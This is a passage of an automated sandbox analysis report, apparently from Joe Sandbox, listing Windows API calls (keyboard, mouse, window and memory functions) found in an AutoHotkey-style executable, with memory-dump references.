      • Part of subcall function 004714C0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0047141F,00000000,?), ref: 00471679
    • SendMessageA.USER32(?,00001002,00000000,?), ref: 0045AF02
    • GetWindowLongA.USER32 ref: 0045AF33
    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0045AF5F
    • SendMessageA.USER32(?,00001005,00000000,?), ref: 0045AF7C
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SetCurrentDirectoryA.KERNEL32(004987E9), ref: 0043ED3E
    • GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043ED7D
    • SetCurrentDirectoryA.KERNEL32(?), ref: 0043EDBA
    • GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043EDC6
    • _strncpy.LIBCMT ref: 0043EDD3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004030C0: joyGetPosEx.WINMM ref: 004030EF
      • Part of subcall function 00402F00: GetTickCount.KERNEL32(?,0000000A), ref: 00402F83
      • Part of subcall function 00402F00: _strncpy.LIBCMT ref: 00402FF3
      • Part of subcall function 00463460: PostMessageA.USER32(?,00000414,2AF80007,00000000), ref: 00463476
      • Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
      • Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
      • Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
      • Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
      • Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9
      • Part of subcall function 00463400: ShowWindow.USER32(?,00000000), ref: 0046340A
      • Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D
      • Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6EA
      • Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6FB
      • Part of subcall function 0040C660: Sleep.KERNEL32(00000000), ref: 0040C7AB
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32 ref: 0040A53A
      • Part of subcall function 0040A3F0: PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00402EC0: GetTickCount.KERNEL32(00402D03,?,?,?,?,?,?), ref: 00402EC0
    • GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040146F
      • Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2
    • GetMessageA.USER32(?,00000000,00000000,-00000311), ref: 004014B6
    • GetTickCount.KERNEL32 ref: 004014C1
    • GetFocus.USER32 ref: 0040155B
      • Part of subcall function 004764E0: GetWindowLongA.USER32(?,000000F0), ref: 004764F4
      • Part of subcall function 004764E0: GetParent.USER32(?), ref: 00476504
      • Part of subcall function 004764E0: GetWindowLongA.USER32(00000000,000000F0), ref: 0047650F
    • ShowWindow.USER32(000601DA,00000000), ref: 00401B84
      • Part of subcall function 0045A160: GetWindowLongA.USER32(00000000,000000F0), ref: 0045A1A0
      • Part of subcall function 0045A160: GetParent.USER32(00000000), ref: 0045A1AA
    • TranslateAccelerator.USER32(00000000,?,?), ref: 004015A1
      • Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012BC
      • Part of subcall function 004012B0: GetParent.USER32(00000000), ref: 004012C7
      • Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012D4
      • Part of subcall function 00466F60: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00466F7A
      • Part of subcall function 00466F60: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00466FB2
      • Part of subcall function 00466F60: SendMessageA.USER32(?,0000130C,-00000001,00000000), ref: 00466FF6
      • Part of subcall function 00466F60: GetDlgCtrlID.USER32 ref: 00467012
      • Part of subcall function 00466F60: PostMessageA.USER32(?,00000414,?,00000000), ref: 0046708A
    • PeekMessageA.USER32(?,00000000,00000000,-00000311,00000001), ref: 00401845
    • GetTickCount.KERNEL32 ref: 00401853
    • Sleep.KERNEL32(00000000), ref: 00401874
    • GetKeyState.USER32(00000011), ref: 004018EA
    • GetWindowLongA.USER32(?,000000F0), ref: 00401912
    • GetKeyState.USER32(00000010), ref: 00401954
    • GetKeyState.USER32(00000011), ref: 004019C0
    • GetKeyState.USER32(000000A5), ref: 004019D5
    • SendMessageA.USER32(?,000000C2,00000001,0049881C), ref: 00401A1F
    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00401A3C
    • SendMessageA.USER32(00000000,00001116,00000000,00000000), ref: 00401A79
    • SendMessageA.USER32(00000000,00001116,00000001,00000000), ref: 00401A93
    • IsDialogMessage.USER32(?,?), ref: 00401AE3
    • KillTimer.USER32(000601DA,00000009), ref: 00401C52
    • GetForegroundWindow.USER32 ref: 00401CEB
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401CFE
    • GetClassNameA.USER32(00000000,?,00000020), ref: 00401D1B
    • IsDialogMessage.USER32(00000000,?), ref: 00401D5A
    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 00401D76
    • DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 00401EA8
    • DragFinish.SHELL32(?), ref: 00401EC3
    • GetTickCount.KERNEL32 ref: 00402122
    • DragFinish.SHELL32(00000000), ref: 004021C9
    • DragFinish.SHELL32(00000000), ref: 004021FA
    • GetTickCount.KERNEL32 ref: 0040225B
    • GetTickCount.KERNEL32 ref: 00402275
    • _strncpy.LIBCMT ref: 00402293
    • _strncpy.LIBCMT ref: 004022B2
    • _strncpy.LIBCMT ref: 00402317
      • Part of subcall function 004034E0: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545
      • Part of subcall function 004034E0: GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7
    • GetTickCount.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402343
    • TranslateAccelerator.USER32(000601DA,0024027F,?), ref: 00402D3F
    • TranslateMessage.USER32(?), ref: 00402D68
    • DispatchMessageA.USER32(?), ref: 00402D73
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetAsyncKeyState.USER32(000000A0), ref: 0040EB06
    • GetAsyncKeyState.USER32(000000A1), ref: 0040EB19
    • GetAsyncKeyState.USER32(000000A2), ref: 0040EB2D
    • GetAsyncKeyState.USER32(000000A3), ref: 0040EB41
    • GetAsyncKeyState.USER32(000000A4), ref: 0040EB55
    • GetAsyncKeyState.USER32(000000A5), ref: 0040EB69
    • GetAsyncKeyState.USER32(0000005B), ref: 0040EB7A
    • GetAsyncKeyState.USER32(0000005C), ref: 0040EB8B
      • Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409
      • Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
      • Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
      • Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
      • Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
      • Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
      • Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetAsyncKeyState.USER32(000000A0), ref: 00411465
    • GetAsyncKeyState.USER32(000000A1), ref: 00411478
    • GetAsyncKeyState.USER32(000000A2), ref: 0041148C
    • GetAsyncKeyState.USER32(000000A3), ref: 004114A0
    • GetAsyncKeyState.USER32(000000A4), ref: 004114B4
    • GetAsyncKeyState.USER32(000000A5), ref: 004114C8
    • GetAsyncKeyState.USER32(0000005B), ref: 004114D9
    • GetAsyncKeyState.USER32(0000005C), ref: 004114EA
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • InterlockedDecrement.KERNEL32(004011C4), ref: 004885E2
    • InterlockedDecrement.KERNEL32(753BFD70), ref: 004885EF
    • InterlockedDecrement.KERNEL32(664815FF), ref: 004885FC
    • InterlockedDecrement.KERNEL32(57187210), ref: 00488609
    • InterlockedDecrement.KERNEL32(0674FF85), ref: 00488616
    • InterlockedDecrement.KERNEL32(0674FF85), ref: 00488632
    • InterlockedDecrement.KERNEL32(004A6920), ref: 00488642
    • InterlockedDecrement.KERNEL32(813C3902), ref: 00488658
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strncpy.LIBCMT ref: 00420E09
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
      • Part of subcall function 00485D47: RtlReAllocateHeap.NTDLL(00000000,00000000,0049555D,00000000), ref: 00485D86
      • Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DC9
      • Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DE1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetProcAddress.KERNEL32(00000000), ref: 0040FC61
      • Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C33
      • Part of subcall function 00408C20: CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse,?,001BC918,?,0040D55D), ref: 00408C3E
      • Part of subcall function 00408C20: GetLastError.KERNEL32 ref: 00408C46
      • Part of subcall function 00408C20: CloseHandle.KERNEL32(00000000), ref: 00408C6D
    • GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040FB0C
    • GetProcAddress.KERNEL32(00000000), ref: 0040FB13
      • Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF0C
      • Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF2E
      • Part of subcall function 0040FE10: GetCursorPos.USER32(?), ref: 0040FF8B
      • Part of subcall function 0040FE10: WindowFromPoint.USER32(?,?), ref: 0040FF9B
      • Part of subcall function 0040FE10: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040FFBB
      • Part of subcall function 0040FE10: SendMessageA.USER32(00000000,00000084,00000000,?), ref: 0040FFE5
      • Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 00410138
      • Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 004101A4
      • Part of subcall function 0040FC90: GetSystemMetrics.USER32(00000017), ref: 0040FCD7
      • Part of subcall function 0040FC90: GetSystemMetrics.USER32(00000017), ref: 0040FCF4
      • Part of subcall function 00410200: GetCursorPos.USER32(004A9140), ref: 00410298
      • Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 004102B5
      • Part of subcall function 00410200: GetSystemMetrics.USER32(00000000), ref: 00410310
      • Part of subcall function 00410200: GetSystemMetrics.USER32(00000001), ref: 00410316
      • Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 00410375
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
      • Part of subcall function 00410820: SendInput.USER32(00000000,00000000,0000001C), ref: 00410880
      • Part of subcall function 00410820: GetForegroundWindow.USER32 ref: 004108C3
      • Part of subcall function 00410820: SetWindowsHookExA.USER32(00000001,0040EC50,00400000,00000000), ref: 00410900
    • GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040FC5A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetCursorPos.USER32(004A9140), ref: 00410298
    • GetCursorPos.USER32(?), ref: 004102B5
    • GetSystemMetrics.USER32(00000000), ref: 00410310
    • GetSystemMetrics.USER32(00000001), ref: 00410316
    • GetCursorPos.USER32(?), ref: 00410375
      • Part of subcall function 004526F0: mouse_event.USER32(00008001,-80000000,-80000000,00000000,FFC3D44D), ref: 004527F3
      • Part of subcall function 004103F0: mouse_event.USER32(?,?,?,00000001,FFC3D44D), ref: 0041043F
      • Part of subcall function 00410A50: Sleep.KERNEL32(?,?,004101AF), ref: 00410B36
      • Part of subcall function 00472C70: GetForegroundWindow.USER32 ref: 00472C74
      • Part of subcall function 00472C70: IsIconic.USER32(00000000), ref: 00472C81
      • Part of subcall function 00472C70: GetWindowRect.USER32(00000000,?), ref: 00472C97
      • Part of subcall function 00472C70: ClientToScreen.USER32 ref: 00472CB5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
    • GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
    • PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
      • Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
      • Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
      • Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
      • Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
      • Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9
    • GetTickCount.KERNEL32 ref: 0040A53A
    Strings
    • %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file), xrefs: 0040A4BE
    • call, xrefs: 0040A48F
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
      • Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
      • Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C
    • SelectObject.GDI32(?,?), ref: 0045E6AA
    • ReleaseDC.USER32(?,?), ref: 0045E6B5
    • CreateWindowExA.USER32(?,msctls_trackbar32,004987E9,?,?,?,?,?,?,?,00400000,00000000), ref: 0045EEBE
    • SendMessageA.USER32(?,00000405,00000001,00000000), ref: 0045EF09
      • Part of subcall function 004665C0: SendMessageA.USER32(00000000,00000402,00000000,00000000), ref: 004665D4
      • Part of subcall function 004665C0: SendMessageA.USER32(?,00000401,00000000,00000000), ref: 004665E8
    • SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
    • GetClientRect.USER32(?,?), ref: 0045F2EF
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
    • SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
    • GetWindowRect.USER32(?,?), ref: 0045F38E
    • SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
    • GetWindowRect.USER32(?,?), ref: 0045F40B
    • MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
    • InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000407,00000000,?), ref: 00466621
      • Part of subcall function 00466600: SendMessageA.USER32(00000000,00000408,00000001,?), ref: 00466631
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000414,?,00000000), ref: 00466653
      • Part of subcall function 00466600: SendMessageA.USER32(00000000,00000417,00000000,00000000), ref: 00466667
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000415,00000000,?), ref: 0046667B
      • Part of subcall function 00466600: SendMessageA.USER32(?,0000041B,00000001,00000000), ref: 0046668F
      • Part of subcall function 00466600: SendMessageA.USER32(?,0000041F,?,00000000), ref: 004666A4
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000001), ref: 004666BA
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000000,00000000), ref: 004666D0
    • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C
      • Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
      • Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
      • Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
      • Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511
      • Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22
    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462
      • Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
      • Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • TlsFree.KERNEL32(0000001A,00488CE1,?,00487C07), ref: 004888E3
    • RtlDeleteCriticalSection.NTDLL(00000000), ref: 00489614
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    • RtlDeleteCriticalSection.NTDLL(0000001A), ref: 0048963E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 004140C8
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00463460: PostMessageA.USER32(?,00000414,2AF80007,00000000), ref: 00463476
      • Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
      • Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
      • Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
      • Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
      • Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9
      • Part of subcall function 00463400: ShowWindow.USER32(?,00000000), ref: 0046340A
      • Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D
      • Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6EA
      • Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6FB
      • Part of subcall function 0040C660: Sleep.KERNEL32(00000000), ref: 0040C7AB
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
